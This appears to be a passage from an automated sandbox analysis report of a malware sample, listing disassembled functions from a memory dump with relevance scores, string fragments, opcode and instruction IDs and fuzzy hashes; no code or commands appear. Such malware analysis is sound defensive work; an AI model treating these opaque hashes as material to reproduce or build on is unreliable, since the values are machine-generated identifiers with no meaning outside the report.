                                                • Instruction ID: 47332991d56c1785341cc7231966a36bb0d80cc5fa2a1bea14f9c7e5caefda5d
                                                • Opcode Fuzzy Hash: a6aee0fa193b127372b375979f9acb7962075c04a7853e442710165e0255d989
                                                • Instruction Fuzzy Hash: F45181B1900305ABE734DFA5C844FEAF7FCAF45740F04456EE4059A580E7B5AA88CB92
                                                Function 03945DF0 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: F$P$T$f$r$x
                                                • API String ID: 0-2523166886
                                                • Opcode ID: 28bd96e8fa79b8ba49d5f3aa611aa13201be7a8b8464d3630a5a20947fcf4181
                                                • Instruction ID: 317ed49e216d0811f599dc818e11da118c2b06a33e6021c14fa8c94a136d5cfc
                                                • Opcode Fuzzy Hash: 28bd96e8fa79b8ba49d5f3aa611aa13201be7a8b8464d3630a5a20947fcf4181
                                                • Instruction Fuzzy Hash: 8001D471C002546ADB20DFA499086DFBF75FF46710F01455DD804BF714E7BA8A49CB94
                                                Function 039454FF Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $i$l$o$u
                                                • API String ID: 0-2051669658
                                                • Opcode ID: ad371dd34f994b88090aa072f6839809b16abae1d8c1c8b158e617ade026e353
                                                • Instruction ID: 2a2cbfe2451bf4a72099bc7fe167f5e36bf5296cd5c071cd12fe99b98e487e66
                                                • Opcode Fuzzy Hash: ad371dd34f994b88090aa072f6839809b16abae1d8c1c8b158e617ade026e353
                                                • Instruction Fuzzy Hash: C96130B5900308AFDB24DBA4CC80FEFB7FDAB89710F148559E55AA7240E735AA45CB60
                                                Function 039454FB Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $i$l$o$u
                                                • API String ID: 0-2051669658
                                                • Opcode ID: ade0f600eb12b801ea045f0c554a1ad1f0d8dc61adfae9331fede6af633b75c6
                                                • Instruction ID: b66a69826e8f36fbe137c1bfc5b58b7796fffee9863a4dbda92f5a931a087f60
                                                • Opcode Fuzzy Hash: ade0f600eb12b801ea045f0c554a1ad1f0d8dc61adfae9331fede6af633b75c6
                                                • Instruction Fuzzy Hash: 37411DB5900308AFDB20DFA4CC84FEFBBFDAB89704F104559E559A7240E771AA41CB60
                                                Function 0394518F Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: b45c075d37d2e9e969e2859eebfb3f6bf6851b04bb3a88e7220016b9bc5cadae
                                                • Instruction ID: 5be2e9b53a5e0323dece37c878c57347e61c479a5499b323ca8be3228915eb87
                                                • Opcode Fuzzy Hash: b45c075d37d2e9e969e2859eebfb3f6bf6851b04bb3a88e7220016b9bc5cadae
                                                • Instruction Fuzzy Hash: BDB11EB5A00304AFDB24DBE9CC85FEFB7BDAF89700F148558F6199B240D675AA41CB50
                                                Function 03945ACF Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$h$o
                                                • API String ID: 0-3662636641
                                                • Opcode ID: 9db09ed0be048a9404982baf7a541e48607b41a7a9acad2f00647a8de2f41c28
                                                • Instruction ID: c2ef47466bd5c9a9ba4d16849d3cc15112a7849da2a663203a6a7b95f792dfa5
                                                • Opcode Fuzzy Hash: 9db09ed0be048a9404982baf7a541e48607b41a7a9acad2f00647a8de2f41c28
                                                • Instruction Fuzzy Hash: 3C81B2B6C003586ADB64EB94CC90FEF73BCEF89340F404299B50D6A144EE746B848FA5
                                                Function 0394518D Relevance: 5.2, Strings: 4, Instructions: 182COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: c17e6e5fa9aa99519393bd179479c6e4f375a88559b5e101e7979f6578b8c6d5
                                                • Instruction ID: a04056c99e33763f81d9446e8a2709d5c8c1a4bd3977e4ecd3b95b90ab4cf2ec
                                                • Opcode Fuzzy Hash: c17e6e5fa9aa99519393bd179479c6e4f375a88559b5e101e7979f6578b8c6d5
                                                • Instruction Fuzzy Hash: F5611AB5A00308AFDB64DFA4C884FEFB7BDAF89700F108558E619AB244D675AA41CB50
                                                Function 0394504F Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                • API String ID: 0-2877786613
                                                • Opcode ID: 0f7dab9e8e6fde8e871e6fb120469bdb3e438132fc1ba393d9bc07b2bcf2b754
                                                • Instruction ID: 7491ec2528a0129e23a19a187d74a053c5af7cb95160503ea01e1ea8d08f31fe
                                                • Opcode Fuzzy Hash: 0f7dab9e8e6fde8e871e6fb120469bdb3e438132fc1ba393d9bc07b2bcf2b754
                                                • Instruction Fuzzy Hash: E7416B799112187FEB01EF90CC52FEF777DAF95610F445048FE04AE280E7B46A8187A6
                                                Function 0394504D Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                • API String ID: 0-2877786613
                                                • Opcode ID: 3f1879a7e0e64f81c96fb08fe3de97fb7322e81f961e6ad161cdf80b96a5aae9
                                                • Instruction ID: b942feeaebdad76a1a3f5718c8b3a16367a88c6ff99bc8399ed5e1c3a6d04eb5
                                                • Opcode Fuzzy Hash: 3f1879a7e0e64f81c96fb08fe3de97fb7322e81f961e6ad161cdf80b96a5aae9
                                                • Instruction Fuzzy Hash: A4314A799512187FEB01EB90CC52FEF777DAF95610F445048FE04AF280E7746A8287A6
                                                Function 03945ACC Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$h$o
                                                • API String ID: 0-3662636641
                                                • Opcode ID: 66e76212d6b1c2e96818f5144cc17f24b81d54cd1462cd3855ab8b1750b7fd6d
                                                • Instruction ID: 26d01a26c9e2cbc084cc5b63228f6588e52570c83afb952b7ac871d7f7681bb5
                                                • Opcode Fuzzy Hash: 66e76212d6b1c2e96818f5144cc17f24b81d54cd1462cd3855ab8b1750b7fd6d
                                                • Instruction Fuzzy Hash: A341B3B5C40358AADB60DFA4CC50FEEB3B8EF48300F4085D9A50DAA144EB746BC48F95
                                                Function 039412EF Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: -$0$2$l
                                                • API String ID: 0-3007954374
                                                • Opcode ID: eb6fca421b52c1a689753e8d05a031672bfb20eab0ffd377e3815d14c38e5228
                                                • Instruction ID: 8cccf796aa7ab468bff12e92b12596aa550a6f905faeee86e1033154f4b4afff
                                                • Opcode Fuzzy Hash: eb6fca421b52c1a689753e8d05a031672bfb20eab0ffd377e3815d14c38e5228
                                                • Instruction Fuzzy Hash: 973141B5D10208BBEB04EFA4CC51FEEB3B8EF48304F004158F904AA240E771AA558BE5
                                                Function 0394274D Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: 9449fcb0064925834eebed5f0ed86acf098c7542e8be4c476d97ddfddca4c005
                                                • Instruction ID: 10a143cfeb9f8bf82c43fcf983288321d38172809791a643959c20f759ebd987
                                                • Opcode Fuzzy Hash: 9449fcb0064925834eebed5f0ed86acf098c7542e8be4c476d97ddfddca4c005
                                                • Instruction Fuzzy Hash: 7401C4B290030CABDB14DF98D884ADEF7B9FF48314F048219F9195F205E771A549CBA0
                                                Function 0394274F Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: 81a24d55465939173eae32837629192261fb555d8acedefd369720a992078bb0
                                                • Instruction ID: 31af0ef14ed8bed7fe1cfca35c79c0139f66101f289d69a758c95a86a36d2da2
                                                • Opcode Fuzzy Hash: 81a24d55465939173eae32837629192261fb555d8acedefd369720a992078bb0
                                                • Instruction Fuzzy Hash: 740184B290031CABDB14DF98D884ADEF7B9FF48314F048259F9195F205E771A545CBA0